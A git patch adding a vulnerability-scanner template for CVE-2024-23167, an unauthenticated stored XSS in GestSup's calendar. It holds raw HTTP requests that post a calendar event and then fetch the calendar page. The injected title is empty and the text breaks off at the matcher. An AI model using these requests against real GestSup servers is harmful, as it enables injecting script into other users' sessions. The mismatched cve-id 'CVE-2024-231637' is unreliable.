From b88a78cfef16dd48c0e0c77a5fc59b08c89249d0 Mon Sep 17 00:00:00 2001
From: soonghee2
Date: Wed, 7 Aug 2024 22:06:40 +0900
Subject: [PATCH] Added/Fixed/Updated CVE-2024-23167 Template

---
 http/cves/2024/CVE-2024-23167.yaml | 47 ++++++++++++++++++++++++++++++
 1 file changed, 47 insertions(+)
 create mode 100644 http/cves/2024/CVE-2024-23167.yaml

diff --git a/http/cves/2024/CVE-2024-23167.yaml b/http/cves/2024/CVE-2024-23167.yaml
new file mode 100644
index 0000000000..35d1ba4395
--- /dev/null
+++ b/http/cves/2024/CVE-2024-23167.yaml
@@ -0,0 +1,47 @@
+id: CVE-2024-23167
+
+info:
+ name: Unauthenticated stored XSS on calendar events (CVE-2024-23167)
+ author: eeche,chae1xx1os,persona-twotwo,soonghee2,gy741
+ severity: high
+ description: GestSup allows its users to add events to the calendar of all users. This is the HTTP request sent when a user adds an event to their calendar.
+ impact: |
+ This vulnerability could allow unauthenticated attackers to compromise users accessing the Calendar feature of the application.
+ remediation:
+ Apply security patches, validate and sanitize inputs to prevent XSS, and ensure proper authentication. Prevent JavaScript execution in the calendar.php file.
+ reference:
+ https://www.synacktiv.com/advisories/multiple-vulnerabilities-on-gestsup-3244
+ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23167
+ https://doc.gestsup.fr/install/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
+ cvss-score: 8.6
+ cve-id: CVE-2024-231637
+ metadata:
+ max-request: 2
+ vendor: gestsup
+ product:
+ gestsup ver 3.2.15
+ Mariadb ver 10.7
+ tags: cve2024, cve, xss, web
+
+
+requests:
+ - raw:
+ - |
+ POST /ajax/calendar.php HTTP/1.1
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ X-Requested-With: XMLHttpRequest
+
+ action=add_event&title=&start=2024/7/30 07:30:00&end=2024/7/30 08:00:00&allday=false&technician=1
+
+ - |
+ GET /index.php?page=calendar HTTP/1.1
+ Cookie: PHPSESSID=9930071b83c5d8aad093aebf8e60a719
+
+ matchers:
+ - type: word
+ words:
+ - '